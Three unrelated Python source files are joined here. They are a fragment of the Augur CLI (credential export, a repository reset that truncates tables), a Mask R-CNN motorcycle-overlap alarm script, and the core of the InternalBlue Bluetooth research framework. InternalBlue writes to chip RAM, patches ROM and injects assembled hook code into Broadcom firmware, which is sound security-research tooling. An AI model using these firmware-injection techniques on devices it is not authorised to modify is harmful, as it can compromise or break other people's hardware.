_broadcast_signal_to_processes(signal=signal.SIGKILL, given_logger=logging.getLogger("augur.cli"))
@cli.command('export-env')
@pass_config
def export_env(config):
"""
Exports your GitHub key and database credentials
"""
export_file = open(os.getenv('AUGUR_EXPORT_FILE', 'augur_export_env.sh'), 'w+')
export_file.write('#!/bin/bash')
export_file.write('\n')
env_file = open(os.getenv('AUGUR_ENV_FILE', 'docker_env.txt'), 'w+')
for env_var in config.get_env_config().items():
if "LOG" not in env_var[0]:
logger.info(f"Exporting {env_var[0]}")
export_file.write('export ' + env_var[0] + '="' + str(env_var[1]) + '"\n')
env_file.write(env_var[0] + '=' + str(env_var[1]) + '\n')
export_file.close()
env_file.close()
@cli.command('repo-reset')
@pass_application
def repo_reset(augur_app):
"""
Refresh repo collection to force data collection
"""
augur_app.database.execute("UPDATE augur_data.repo SET repo_path = NULL, repo_name = NULL, repo_status = 'New'; TRUNCATE augur_data.commits CASCADE; ")
logger.info("Repos successfully reset")
@cli.command('processes')
@initialize_logging
def processes():
"""
Outputs the name/PID of all Augur server & worker processes"""
logger = logging.getLogger("augur.cli")
processes = get_augur_processes()
for process in processes:
logger.info(f"Found process {process.pid}")
def get_augur_processes():
processes = []
for process in psutil.process_iter(['cmdline', 'name', 'environ']):
if process.info['cmdline'] is not None and process.info['environ'] is not None:
try:
if os.getenv('VIRTUAL_ENV') in process.info['environ']['VIRTUAL_ENV'] and 'python' in ''.join(process.info['cmdline'][:]).lower():
if process.pid != os.getpid():
processes.append(process)
except KeyError:
pass
return processes
def _broadcast_signal_to_processes(signal=signal.SIGTERM, given_logger=None):
if given_logger is None:
_logger = logger
else:
_logger = given_logger
processes = get_augur_processes()
if processes != []:
for process in processes:
if process.pid != os.getpid():
logger.info(f"Stopping process {process.pid}")
try:
process.send_signal(signal)
except psutil.NoSuchProcess as e:
pass
def initialize_components(augur_app, disable_housekeeper):
master = None
manager = None
broker = None
housekeeper = None
worker_processes = []
mp.set_start_method('forkserver', force=True)
if not disable_housekeeper:
manager = mp.Manager()
broker = manager.dict()
housekeeper = Housekeeper(broker=broker, augur_app=augur_app)
controller = augur_app.config.get_section('Workers')
for worker in controller.keys():
if controller[worker]['switch']:
for i in range(controller[worker]['workers']):
logger.info("Booting {} #{}".format(worker, i + 1))
worker_process = mp.Process(target=worker_start, name=f"{worker}_{i}", kwargs={'worker_name': worker, 'instance_number': i, 'worker_port': controller[worker]['port']}, daemon=True)
worker_processes.append(worker_process)
worker_process.start()
augur_app.manager = manager
augur_app.broker = broker
augur_app.housekeeper = housekeeper
atexit._clear()
atexit.register(exit, augur_app, worker_processes, master)
return AugurGunicornApp(augur_app.gunicorn_options, augur_app=augur_app)
def worker_start(worker_name=None, instance_number=0, worker_port=None):
try:
time.sleep(30 * instance_number)
destination = subprocess.DEVNULL
process = subprocess.Popen("cd workers/{} && {}_start".format(worker_name,worker_name), shell=True, stdout=destination, stderr=subprocess.STDOUT)
logger.info("{} #{} booted.".format(worker_name,instance_number+1))
except KeyboardInterrupt as e:
pass
def exit(augur_app, worker_processes, master):
logger.info("Shutdown started for this Gunicorn worker...")
augur_app.shutdown()
if worker_processes:
for process in worker_processes:
logger.debug("Shutting down worker process with pid: {}...".format(process.pid))
process.terminate()
if master is not None:
logger.debug("Shutting down Gunicorn server")
master.halt()
logger.info("Shutdown complete")
sys.exit(0)
|
moto_alarm.py
|
import os
import cv2
import time, datetime
import mrcnn
import mrcnn.config
import mrcnn.utils
import queue
import threading
import numpy as np
import winsound
from mrcnn.model import MaskRCNN
from mrcnn import visualize
from pathlib import Path
VIDEO_SOURCE = "./assets/sample1.mp4" # put here URL to the video stream
###########################################################################################################################
# Configuration that will be used by the Mask-RCNN library
class MaskRCNNConfig(mrcnn.config.Config):
NAME = "coco_pretrained_model_config"
IMAGES_PER_GPU = 1
GPU_COUNT = 1
NUM_CLASSES = 1 + 80 # COCO dataset has 80 classes + one background class
DETECTION_MIN_CONFIDENCE = 0.6
###########################################################################################################################
# Bufferless VideoCapture
class VideoCapture:
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# Read frames as soon as they are available, keeping only most recent one
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except queue.Empty:
pass
self.q.put(frame)
self.cap.release()
def read(self):
try:
return self.q.get(block=True, timeout=5)
except queue.Empty:
return None
###########################################################################################################################
def get_other_objects_boxes(boxes, class_ids):
object_boxes = []
for i, box in enumerate(boxes):
# If the detected object is motorcycle, skip it
if class_ids[i]!=4:
object_boxes.append(box)
return np.array(object_boxes)
def get_motorcycle_boxes(boxes, class_ids, scores):
motorcycle_boxes = []
for i, box in enumerate(boxes):
# If the detected object isn't a motorcycle, skip it
if class_ids[i]==4 and scores[i]>0.9:
motorcycle_boxes.append(box)
return np.array(motorcycle_boxes)
###########################################################################################################################
# Root directory of the project
ROOT_DIR = Path(".")
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Directory to save images
IMAGES_DIR = os.path.join(ROOT_DIR, "images")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
mrcnn.utils.download_trained_weights(COCO_MODEL_PATH)
# Create folder for images
if not os.path.exists(IMAGES_DIR):
os.mkdir(IMAGES_DIR)
# Create a Mask-RCNN model in inference mode
model = MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=MaskRCNNConfig())
# Load pre-trained model
model.load_weights(COCO_MODEL_PATH, by_name=True)
# Load the video file we want to run detection on
video_capture = VideoCapture(VIDEO_SOURCE)
# Loop over each frame of video
# counter = 0
while True:
frame = video_capture.read()
if frame is None:
break
# Crop the image
# x = frame.shape[0]-800
# y = frame.shape[1]-800
# frame = frame[x:-1, y:-1]
# Convert the image from BGR color (which OpenCV uses) to RGB color
rgb_image = frame[:, :, ::-1]
# Run the image through the Mask R-CNN model to get results.
results = model.detect([rgb_image], verbose=0)
# Mask R-CNN assumes we are running detection on multiple images.
# We only passed in one image to detect, so only grab the first result.
r = results[0]
# The r variable will now have the results of detection:
# - r['rois'] are the bounding box of each detected object
# - r['class_ids'] are the class id (type) of each detected object
# - r['scores'] are the confidence scores for each detection
# - r['masks'] are the object masks for each detected object (which gives you the object outline)
# Get boxes of all detected motorcycles
motorcycle_boxes = get_motorcycle_boxes(r['rois'], r['class_ids'], r['scores'])
print("Motorcycles detected: ", len(motorcycle_boxes))
# Get boxes of all other objects
other_objects_boxes = get_other_objects_boxes(r['rois'], r['class_ids'])
print("Other objects detected: ", len(other_objects_boxes))
# Draw green rectangles around motorcycles
for box in motorcycle_boxes:
y1, x1, y2, x2 = box
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 1)
# Draw red rectangles around other objects
for box in other_objects_boxes:
y1, x1, y2, x2 = box
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 1)
# See how much those objects overlap with the motorcycles
overlaps = mrcnn.utils.compute_overlaps(motorcycle_boxes, other_objects_boxes)
    # Assume no overlaps with motorcycles
is_overlap_detected = False
for overlap in overlaps:
        # For this motorcycle, find the maximum amount by which it was covered by any
        # other object detected in the image
max_IoU_overlap = np.max(overlap)
print("Max overlap: ", max_IoU_overlap)
if max_IoU_overlap > 0.2:
is_overlap_detected = True
print("Is overlap detected: ", is_overlap_detected)
# If overlap is detected save the frame to the file and beep (Windows)
if is_overlap_detected:
filename = datetime.datetime.now().strftime('%G-%m-%d_%H-%M-%S_overlap.jpg')
cv2.imwrite(os.path.join(IMAGES_DIR, filename), frame)
winsound.Beep(2500, 1000)
# Uncomment the lines below to see the result in real time
# cv2.imshow('frame', frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cv2.destroyAllWindows()
|
core.py
|
#!/usr/bin/env python3
# core.py
#
# This file contains the main class of the framework which
# includes the thread functions for the receive and send thread.
# It also implements methods to setup the TCP connection to the
# Android Bluetooth stack via ADB port forwarding
#
# Copyright (c) 2020 The InternalBlue Team. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import division
import datetime
import logging
import queue as queue2k
import socket
import struct
import time
from abc import ABCMeta, abstractmethod
from builtins import hex, str, range, object
from threading import Thread
from future import standard_library
from future.utils import with_metaclass
from past.utils import old_div
from . import hci
from .fw import FirmwareDefinition
from .fw.fw import Firmware
from .hci import HCI, HCI_COMND
from .objects.connection_information import ConnectionInformation
from .objects.queue_element import QueueElement
from .utils import flat, bytes_to_hex
from .utils.packing import p8, p16, u16, p32, u32, bits, unbits
from .utils.internalblue_logger import getInternalBlueLogger
standard_library.install_aliases()
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Union, NewType, Callable, cast
from internalblue import (Address, Record, Task, HCI_CMD, FilterFunction, ConnectionNumber, ConnectionDict,
ConnectionIndex, BluetoothAddress, HeapInformation, QueueInformation, Opcode)
from . import DeviceTuple
except ImportError:
pass
try:
import pwnlib
from pwnlib import context
from pwnlib.asm import disasm, asm
from pwnlib.exception import PwnlibException
context.context.arch = 'thumb'
except ImportError:
pwnlib = context = disasm = asm = PwnlibException = None
_has_pwnlib = False
import warnings
warnings.formatwarning = (lambda x, *args, **kwargs: f"\x1b[31m[!] {x}\x1b[0m\n")
warnings.warn("pwnlib is not installed. Some features will not work.")
else:
_has_pwnlib = True
def needs_pwnlib(func):
def inner(*args, **kwargs):
if not _has_pwnlib:
raise ImportError("pwnlib is required for this function.")
return func(*args, **kwargs)
return inner
class InternalBlue(with_metaclass(ABCMeta, object)):
@property
def log_level(self):
return self._internal_loglevel
@log_level.setter
def log_level(self, new):
levels = {"CRITICAL": logging.CRITICAL, "ERROR": logging.ERROR,
"WARNING": logging.WARNING, "INFO": logging.INFO,
"DEBUG": logging.DEBUG, "NOTSET": logging.NOTSET,
"WARN": logging.WARN}
new = new.upper()
self._internal_loglevel = new
level = levels[new]
if self.logger.hasHandlers() and level is not None:
self.logger.setLevel(level)
if len(self.logger.handlers) > 0:
self.logger.handlers[0].setLevel(level)
def __init__(
self,
queue_size: int = 1000,
btsnooplog_filename: str = "btsnoop.log",
log_level: str = "info",
data_directory: str = ".",
replay: bool = False,
) -> None:
# get and store 'InternalBlue' logger
self.logger = getInternalBlueLogger()
self.interface = None # holds the self.device / hci interface which is used to connect, is set in cli
self.fw: FirmwareDefinition = None # holds the firmware file
self.data_directory = data_directory
self.s_inject = (
None
) # type: socket.socket # This is the TCP socket to the HCI inject port
self.s_snoop = (
None
) # type: socket.socket # This is the TCP socket to the HCI snoop port
        # If btsnooplog_filename is set, write all incoming HCI packets to a file (can be viewed in wireshark for debugging)
if btsnooplog_filename is not None:
self.write_btsnooplog = True
self.btsnooplog_file = open(
self.data_directory + "/" + btsnooplog_filename, "wb"
)
else:
self.write_btsnooplog = False
# The sendQueue connects the core framework to the sendThread. With the
# function sendH4 or sendHciCommand, the core framework (or a CLI command / user script)
# can put an H4 packet or HCI Command into this queue. The queue entry should be a tuple:
# (h4type, data, response_queue, response_hci_filter_function)
# - h4type: The H4 packet type (e.g. 1 for HCI Command or 7 for Broadcom Diagnostic)
# - data: The H4 payload (byte string)
# - response_queue: queue that is used for delivering the H4 response
# back to the entity that put the H4 command into the
# sendQueue. May be None if no response is expected/needed.
# If a response_queue is specified, it is also necessary to
# specify a response_hci_filter_function.
# - response_hci_filter_function: An hci callback function (see registerHciCallback())
        #                       that is used to test whether incoming H4 packets are the
# response to the packet that was sent. May be None if response_queue
# is also None.
# The sendThread polls the queue, gets the above mentioned tuple, sends the
# H4 command to the firmware and then waits for the response from the
# firmware (the response is recognized with the help of the filter function).
# Once the response arrived, it puts the response into the response_queue from
# the tuple. See sendH4() and sendHciCommand().
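        # Illustrative sketch of such a 'send task' (names like hci_command_payload and
        # filter_fn are placeholders; in practice sendHciCommand()/sendH4() build and
        # enqueue the tuple for you):
        #
        #   response_queue = queue2k.Queue(1)
        #   filter_fn = lambda record: True   # a real filter inspects the received HCI packet
        #   self.sendQueue.put((0x01, hci_command_payload, response_queue, filter_fn))
        #   hci_event_payload = response_queue.get(timeout=2)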
self.sendQueue = queue2k.Queue(queue_size) # type: queue2k.Queue[Task]
self.recvThread: Optional[
Thread
] = None # The thread which is responsible for the HCI snoop socket
self.sendThread: Optional[
Thread
] = None # The thread which is responsible for the HCI inject socket
self.tracepoints = [] # A list of currently active tracepoints
# The list contains tuples:
# [0] target address
# [1] address of the hook code
self.tracepoint_registers: Optional[
List[int]
] = None # Last captured register values from a tracepoint
self.tracepoint_memdump_parts = {} # Last captured RAM dump from a tracepoint
self.tracepoint_memdump_address = None # Start address of the RAM dump
# The registeredHciCallbacks list holds callback functions which are being called by the
# recvThread once a HCI Event is being received. Use registerHciCallback() for registering
# a new callback (put it in the list) and unregisterHciCallback() for removing it again.
self.registeredHciCallbacks = []
# The registeredHciRecvQueues list holds queues which are being filled by the
# recvThread once a HCI Event is being received. Use registerHciRecvQueue() for registering
# a new queue (put it in the list) and unregisterHciRecvQueue() for removing it again.
# Actually the registeredHciRecvQueues holds tuples with the format: (queue, filter_function)
# filter_function will be called for each packet that is received and only if it returns
# True, the packet will be put into the queue. The filter_function can be None in order
# to put all packets into the queue.
self.registeredHciRecvQueues = (
[]
) # type: List[Tuple[queue2k.Queue[Record], FilterFunction]]
self.exit_requested = False # Will be set to true when the framework wants to shut down (e.g. on error or user exit)
self.running = False # 'running' is True once the connection to the HCI sockets is established
# and the recvThread and sendThread are started (see connect() and shutdown())
self.log_level = log_level
if _has_pwnlib:
self.check_binutils() # Check if ARM binutils are installed (needed for asm() and disasm())
# If fix_binutils is True, the function tries to fix the error were
# the binutils are installed but not found by pwntools (e.g. under Arch Linux)
self.stackDumpReceiver = None # This class will monitor the HCI Events and detect stack trace events.
# Register callbacks which handle specific HCI Events:
self.registerHciCallback(self.connectionStatusCallback)
self.registerHciCallback(self.coexStatusCallback)
self.registerHciCallback(self.readMemoryPoolStatisticsCallback)
# If the --replay flag was used and a chip is spoofed.
self.replay = replay
@needs_pwnlib
def check_binutils(self, fix=True):
"""
Test if ARM binutils is in path so that asm and disasm (provided by
pwntools) work correctly.
It may happen, that ARM binutils are installed but not found by pwntools.
If 'fix' is True, check_binutils will try to fix this.
"""
saved_loglevel = self.log_level
context.log_level = "critical"
try:
pwnlib.asm.which_binutils(
"as"
) # throws PwnlibException if as cannot be found
self.log_level = saved_loglevel
return True
except PwnlibException:
self.log_level = saved_loglevel
self.logger.debug("pwnlib.asm.which_binutils() cannot find 'as'!")
if not fix:
return False
# Work around for arch (with installed arm-none-eabi-binutils)
import os
from glob import glob
def which_binutils_fixed(tool):
pattern = "arm-*-%s" % tool
for directory in os.environ["PATH"].split(":"):
res = sorted(glob(os.path.join(directory, pattern)))
if res:
return res[0]
raise PwnlibException("Could not find tool %s." % tool)
try:
which_binutils_fixed("as")
# yeay it worked! fix it in pwnlib:
pwnlib.asm.which_binutils = which_binutils_fixed
self.logger.debug("installing workaround for pwnlib.asm.which_binutils() ...")
return True
except PwnlibException:
self.logger.warning(
"pwntools cannot find binutils for arm architecture. Disassembling will not work!"
)
return False
def _parse_time(self, timeParam):
# type: (Any) -> datetime.datetime
"""
Taken from: https://github.com/joekickass/python-btsnoop
Record time is a 64-bit signed integer representing the time of packet arrival,
in microseconds since midnight, January 1st, 0 AD nominal Gregorian.
In order to avoid leap-day ambiguity in calculations, note that an equivalent
epoch may be used of midnight, January 1st 2000 AD, which is represented in
this field as 0x00E03AB44A676000.
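        For example, a raw value of exactly 0x00E03AB44A676000 therefore corresponds to
        midnight, January 1st 2000 AD.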
"""
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(
microseconds=timeParam
) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
@abstractmethod
def _recvThreadFunc(self):
# type: () -> None
pass
def _sendThreadFunc(self):
# type: () -> None
"""
This is the run-function of the sendThread. It polls the sendQueue for new 'send tasks'
and executes them (sends H4 commands to the chip and returns the response).
The entries of the sendQueue are tuples representing a 'send task':
(h4type, payload, response_queue)
- h4type: The H4 type (8 bit integer) to send
- data: The H4 payload (byte string) to send
- response_queue: queue that is used for delivering the H4 response
back to the entity that put the H4 command into the
sendQueue.
Use sendHciCommand() to put 'send tasks' into the sendQueue!
The thread stops when exit_requested is set to True.
"""
self.logger.debug("Send Thread started.")
while not self.exit_requested:
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
try:
h4type, data, queue, filter_function = task
except ValueError:
# might happen if H4 is not supported
self.logger.debug("Failed to unpack queue item.")
continue
# Special handling of ADBCore and HCICore
# ADBCore: adb transport requires to prepend the H4 data with its length
# HCICore: need to manually save the data to btsnoop log as it is not
# reflected to us as with adb
if self.__class__.__name__ == "ADBCore":
# prepend with total length for H4 over adb with modified Bluetooth module
if not self.serial:
data = p16(len(data)) + data
# If we do not have a patched module, we write to the serial using the same socket.
# Echoing HCI commands to the serial interface has the following syntax:
#
# echo -ne "\x01\x4c\xfc\x05\x33\x22\x11\x00\xaa"
# 0x01: HCI command
# 0xfc4c: Write RAM
# 0x05: Parameter length
# 0x3322...: Parameters
#
# ...and that's how the data is formatted already anyway
elif self.__class__.__name__ == "HCICore":
if self.write_btsnooplog:
# btsnoop record header data:
btsnoop_data = p8(h4type) + data
btsnoop_orig_len = len(btsnoop_data)
btsnoop_inc_len = len(btsnoop_data)
btsnoop_flags = 0
btsnoop_drops = 0
btsnoop_time = datetime.datetime.now()
btsnoop_record_hdr = struct.pack(
">IIIIq",
btsnoop_orig_len,
btsnoop_inc_len,
btsnoop_flags,
btsnoop_drops,
self._btsnoop_pack_time(btsnoop_time),
)
with self.btsnooplog_file_lock:
self.btsnooplog_file.write(btsnoop_record_hdr)
self.btsnooplog_file.write(btsnoop_data)
self.btsnooplog_file.flush()
# Prepend UART TYPE and length.
out = p8(h4type) + data
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Send command to the chip using s_inject socket
try:
self.logger.debug("_sendThreadFunc: Send: " + bytes_to_hex(out))
self.s_inject.send(out)
except socket.error:
# TODO: For some reason this was required for proper save and replay, so this should be handled globally somehow. Or by implementing proper testing instead of the save/replay hack
pass
except socket.error as e:
self.logger.warning(
"_sendThreadFunc: Sending to socket failed with {}, reestablishing connection.\nWith HCI sockets, some HCI commands require root!".format(
e
)
)
# socket are terminated by hcicore..
self._teardownSockets()
self._setupSockets()
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
try:
record = recvQueue.get(timeout=2)
hcipkt = record[0]
data = hcipkt.data
except queue2k.Empty:
self.logger.warning("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
continue
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
self.logger.debug("Send Thread terminated.")
def _tracepointHciCallbackFunction(self, record):
# type: (Record) -> None
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
# Check if event contains a tracepoint packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code != 0xFF: # must be custom event (0xff)
return
if hcipkt.data[0:6] == "TRACE_": # My custom header (see hook code)
data = hcipkt.data[6:]
tracepoint_registers = [u32(data[i: i + 4]) for i in range(0, 68, 4)]
pc = tracepoint_registers[0]
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x cpsr: 0x%08x\n" % (
pc,
tracepoint_registers[16],
tracepoint_registers[1],
tracepoint_registers[2],
)
registers += (
"r0: 0x%08x r1: 0x%08x r2: 0x%08x r3: 0x%08x r4: 0x%08x\n"
% tuple(tracepoint_registers[3:8])
)
registers += (
"r5: 0x%08x r6: 0x%08x r7: 0x%08x r8: 0x%08x r9: 0x%08x\n"
% tuple(tracepoint_registers[8:13])
)
registers += "r10: 0x%08x r11: 0x%08x r12: 0x%08x\n" % tuple(
tracepoint_registers[13:16]
)
self.logger.info("Tracepoint 0x%x was hit and deactivated:\n" % pc + registers)
filename = (
self.data_directory
+ "/"
+ "internalblue_tracepoint_registers_%s.bin"
% datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
)
self.logger.info("Captured Registers for Tracepoint to %s" % filename)
f = open(filename, "w")
f.write(registers)
f.close()
self.tracepoint_registers = tracepoint_registers
# remove tracepoint from self.tracepoints
for tp in self.tracepoints:
if tp[0] == pc:
self.tracepoints.remove(tp)
break
# reset all RAM dump related variables:
self.tracepoint_memdump_address = None
self.tracepoint_memdump_parts = {}
elif hcipkt.data[0:6] == "RAM___": # My custom header (see hook code)
dump_address = u32(hcipkt.data[6:10])
data = hcipkt.data[10:]
if self.tracepoint_memdump_address is None:
self.tracepoint_memdump_address = dump_address
normalized_address = dump_address - self.tracepoint_memdump_address
self.tracepoint_memdump_parts[normalized_address] = data
# Check if this was the last packet
if (
len(self.tracepoint_memdump_parts)
== self.fw.TRACEPOINT_RAM_DUMP_PKT_COUNT
):
dump = flat(self.tracepoint_memdump_parts)
# TODO: use this to start qemu
filename = (
self.data_directory
+ "/"
+ "internalblue_tracepoint_0x%x_%s.bin"
% (
self.tracepoint_memdump_address,
datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"),
)
)
self.logger.info(
"Captured Ram Dump for Tracepoint 0x%x to %s"
% (self.tracepoint_memdump_address, filename)
)
f = open(filename, "wb")
f.write(dump)
f.close()
@needs_pwnlib
def addTracepoint(self, address):
# type: (Address) -> bool
# Check if constants are defined in fw.py
for const in [
"TRACEPOINT_BODY_ASM_LOCATION",
"TRACEPOINT_BODY_ASM_SNIPPET",
"TRACEPOINT_HOOK_ASM",
"TRACEPOINT_HOOKS_LOCATION",
"TRACEPOINT_HOOK_SIZE",
]:
if const not in dir(self.fw):
self.logger.warning(
"addTracepoint: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return False
# FIXME: Currently only works for aligned addresses
if address % 4 != 0:
self.logger.warning("Only tracepoints at aligned addresses are allowed!")
return False
# Check if tracepoint exists
existing_hook_addresses = []
for tp_address, tp_hook_address in self.tracepoints:
existing_hook_addresses.append(tp_hook_address)
if tp_address == address:
self.logger.warning("Tracepoint at 0x%x does already exist!" % address)
return False
# we only have room for 0x90/28 = 5 tracepoints
if len(self.tracepoints) >= 5:
self.logger.warning("Already using the maximum of 5 tracepoints")
return False
# Find a free address for the hook code
for i in range(5):
hook_address = (
self.fw.TRACEPOINT_HOOKS_LOCATION + self.fw.TRACEPOINT_HOOK_SIZE * i
)
if hook_address not in existing_hook_addresses:
break
# Check if this is the first tracepoint
if self._tracepointHciCallbackFunction not in self.registeredHciCallbacks:
self.logger.info("Initial tracepoint: setting up tracepoint engine.")
# compile assembler snippet containing the hook body code:
hooks_code = asm(
self.fw.TRACEPOINT_BODY_ASM_SNIPPET,
vma=self.fw.TRACEPOINT_BODY_ASM_LOCATION,
arch="thumb",
)
if len(hooks_code) > 0x100:
self.logger.error(
"Assertion failed: len(hooks_code)=%d is larger than 0x100!"
% len(hooks_code)
)
# save memory content at the addresses where we place the snippet and the stage-1 hooks
self.tracepoint_saved_data = self.readMem(
self.fw.TRACEPOINT_BODY_ASM_LOCATION, 0x100
)
# write code for hook to memory
self.writeMem(self.fw.TRACEPOINT_BODY_ASM_LOCATION, hooks_code)
# Register tracepoint hci callback function
self.registerHciCallback(self._tracepointHciCallbackFunction)
# Add tracepoint to list
self.tracepoints.append((address, hook_address))
### Injecting stage-1 hooks ###
# save the 4 bytes at which the hook branch (e.g. b <hook address>) will be placed
saved_instructions = self.readMem(address, 4)
# we need to know the patchram slot in advance..
# little trick/hack: we just insert a patch now with the original data to
# receive the slot value. later we insert the actual patch which will reuse
# the same slot.
# FIXME: To increase performance, try to not do it like that ^^
self.patchRom(address, saved_instructions)
table_addresses, _, _ = self.getPatchramState()
patchram_slot = table_addresses.index(address)
self.logger.info("Using patchram slot %d for tracepoint." % patchram_slot)
self.disableRomPatch(
address
) # Eval board requires to delete patch before installing it again
# compile assembler snippet containing the stage-1 hook code:
stage1_hook_code = asm(
self.fw.TRACEPOINT_HOOK_ASM
% (address, patchram_slot, self.fw.TRACEPOINT_BODY_ASM_LOCATION, address),
vma=hook_address,
arch="thumb",
)
if len(stage1_hook_code) > self.fw.TRACEPOINT_HOOK_SIZE:
self.logger.error(
"Assertion failed: len(stage1_hook_code)=%d is larger than TRACEPOINT_HOOK_SIZE!"
% len(stage1_hook_code)
)
return False
# write code for hook to memory
self.logger.debug("addTracepoint: injecting hook function...")
self.writeMem(hook_address, stage1_hook_code)
# patch in the hook branch instruction
patch = asm("b 0x%x" % hook_address, vma=address, arch="thumb")
if not self.patchRom(address, patch):
self.logger.warning("addTracepoint: couldn't insert tracepoint hook!")
return False
self.logger.debug(
"addTracepoint: Placed Tracepoint at 0x%08x (hook at 0x%x)."
% (address, hook_address)
)
return True
def deleteTracepoint(self, address):
# type: (Address) -> bool
if not self.check_running():
return False
# find tracepoint in the list
for tp in self.tracepoints:
if tp[0] == address:
# disable patchram slot for the tracepoint
self.disableRomPatch(tp[0])
# remove tracepoint from self.tracepoints
self.tracepoints.remove(tp)
break
else:
self.logger.warning("deleteTracepoint: No tracepoint at address: 0x%x" % address)
return False
return True
def check_running(self):
# type: () -> bool
"""
Check if the framework is running (i.e. the sockets are connected,
the recv and send threads are running and exit_requested is not True)
"""
if self.exit_requested:
self.shutdown()
if not self.running:
self.logger.warning("Not running. call connect() first!")
return False
return True
@abstractmethod
def device_list(self):
# type: () -> List[DeviceTuple]
pass
def connect(self):
# type: () -> bool
if self.exit_requested:
self.shutdown()
if self.running:
self.logger.warning("Already running. call shutdown() first!")
return False
if not self.interface:
self.logger.warning("No adb device identifier is set")
return False
if not self.local_connect():
return False
self.logger.info(f"Connected to {self.interface}")
# start receive thread
self.recvThread = Thread(target=self._recvThreadFunc)
self.recvThread.setDaemon(True)
self.recvThread.start()
# start send thread
self.sendThread = Thread(target=self._sendThreadFunc)
self.sendThread.setDaemon(True)
self.sendThread.start()
# register stackDumpReceiver callback:
self.stackDumpReceiver = hci.StackDumpReceiver()
# register hci callback:
self.registerHciCallback(self.stackDumpReceiver.recvPacket)
if not self.initialize_fimware():
self.logger.warning("connect: Failed to initialize firmware!")
return False
self.running = True
return True
@abstractmethod
def local_connect(self):
return True
def initialize_fimware(self):
# type: () -> bool
"""
Checks if we are running on a Broadcom chip and loads available firmware information based
on LMP subversion.
"""
# send Read_Local_Version_Information
version = self.sendHciCommand(
HCI_COMND.Read_Local_Version_Information, "".encode("utf-8")
)
if not version or len(version) < 12: # bytes 10 and 11 are read below for the LMP subversion
self.logger.warning(
"""initialize_fimware: Failed to send a HCI command to the Bluetooth driver.
adb: Check if you installed a custom bluetooth.default.so properly on your
Android device. bluetooth.default.so must contain the string 'hci_inject'.
hci: You might have insufficient permissions to send this type of command."""
)
return False
# Broadcom uses 0x000f as vendor ID, Cypress 0x0131
vendor = (version[9] << 8) + version[8]
if vendor != 0xF and vendor != 0x131:
self.logger.critical("Not running on a Broadcom or Cypress chip!")
return False
else:
subversion = (version[11] << 8) + version[10]
iOS = False
if self.__class__.__name__ == "iOSCore":
iOS = True
self.fw = Firmware(subversion, iOS).firmware
# Safe to turn diagnostic logging on, it just gets a timeout if the Android
# driver was recompiled with other flags but without applying a proper patch.
self.logger.info("Try to enable debugging on H4 (warning if not supported)...")
self.enableBroadcomDiagnosticLogging(True)
return True
def shutdown(self):
# type: () -> None
"""
Shutdown the framework by stopping the send and recv threads. Socket shutdown
also terminates port forwarding if adb is used.
"""
# Setting exit_requested to True will stop the send and recv threads at their
# next while loop iteration
self.exit_requested = True
# unregister stackDumpReceiver callback before dropping the reference:
if self.stackDumpReceiver is not None:
self.unregisterHciCallback(self.stackDumpReceiver.recvPacket)
self.stackDumpReceiver = None
# Wait until both threads have actually finished
self.recvThread.join()
self.sendThread.join()
# Disconnect the TCP sockets
self._teardownSockets()
if self.write_btsnooplog:
self.btsnooplog_file.close()
self.running = False
self.exit_requested = False
self.logger.info("Shutdown complete.")
def registerHciCallback(self, callback):
# type: (Callable[[Record], None ]) -> None
"""
Add a new callback function to self.registeredHciCallbacks.
The function will be called every time the recvThread receives
a HCI packet. The packet will be passed to the callback function
as first argument. The format is a tuple containing:
- HCI packet (subclass of HCI, see hci.py)
- original length
- inc_len
- flags
- drops
- timestamp (python datetime object)
"""
if callback in self.registeredHciCallbacks:
self.logger.warning("registerHciCallback: callback already registered!")
return
self.registeredHciCallbacks.append(callback)
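# Illustrative sketch (not from the original source): a minimal HCI callback that
# logs every received packet; 'internalblue' stands for a connected instance of
# this core class.
#
#   def my_callback(record):
#       hcipkt, orig_len, inc_len, flags, drops, timestamp = record
#       print("%s: %s" % (timestamp, hcipkt))
#
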